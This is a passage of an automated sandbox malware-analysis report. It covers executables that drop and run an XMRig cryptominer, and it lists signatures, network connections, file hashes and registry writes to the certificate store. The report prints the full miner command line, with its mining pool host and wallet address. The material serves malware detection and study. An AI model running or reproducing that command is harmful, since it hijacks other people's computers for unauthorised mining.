| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1616 wrote to memory of 440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1616 wrote to memory of 440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/440-16-0x000001DB991A0000-0x000001DB991C0000-memory.dmp
memory/440-17-0x000001DB991F0000-0x000001DB99210000-memory.dmp
memory/440-18-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-20-0x000001DB99230000-0x000001DB99250000-memory.dmp
memory/440-19-0x000001DB99210000-0x000001DB99230000-memory.dmp
memory/440-21-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-22-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-23-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-25-0x000001DB99230000-0x000001DB99250000-memory.dmp
memory/440-24-0x000001DB99210000-0x000001DB99230000-memory.dmp
memory/440-26-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-27-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-28-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-29-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-30-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-31-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-32-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-33-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-34-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-35-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-36-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-37-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-38-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-39-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-40-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-41-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-42-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-43-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-44-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-45-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-46-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-47-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-48-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-49-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-50-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-51-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-52-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-53-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-54-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-55-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-56-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-57-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-58-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-59-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-60-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-61-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-62-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-63-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-64-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-65-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-66-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-67-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-68-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-69-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-70-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-71-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-72-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-73-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-74-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-75-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-76-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-77-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-78-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-79-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-80-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-81-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-82-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-83-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
memory/440-84-0x00007FF6EE490000-0x00007FF6EEF93000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1620 wrote to memory of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1620 wrote to memory of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1824-16-0x000001E9F3720000-0x000001E9F3740000-memory.dmp
memory/1824-17-0x000001E9F3770000-0x000001E9F3790000-memory.dmp
memory/1824-18-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-20-0x000001EA86160000-0x000001EA86180000-memory.dmp
memory/1824-19-0x000001E9F3790000-0x000001E9F37B0000-memory.dmp
memory/1824-21-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-22-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-25-0x000001EA86160000-0x000001EA86180000-memory.dmp
memory/1824-24-0x000001E9F3790000-0x000001E9F37B0000-memory.dmp
memory/1824-23-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-26-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-27-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-28-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-29-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-30-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-31-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-32-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-33-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-34-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-35-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-36-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-37-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-38-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-39-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-40-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-41-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-42-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-43-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-44-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-45-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-46-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-47-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-48-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-49-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-50-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-51-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-52-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-53-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-54-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-55-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-56-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-57-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-58-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-59-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-60-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-61-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-62-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-63-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-64-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-65-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-66-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-67-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-68-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-69-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-70-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-71-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-72-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-73-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-74-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-75-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-76-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-77-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-78-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-79-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-80-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-81-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-82-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-83-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
memory/1824-84-0x00007FF6F5140000-0x00007FF6F5C43000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:06
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
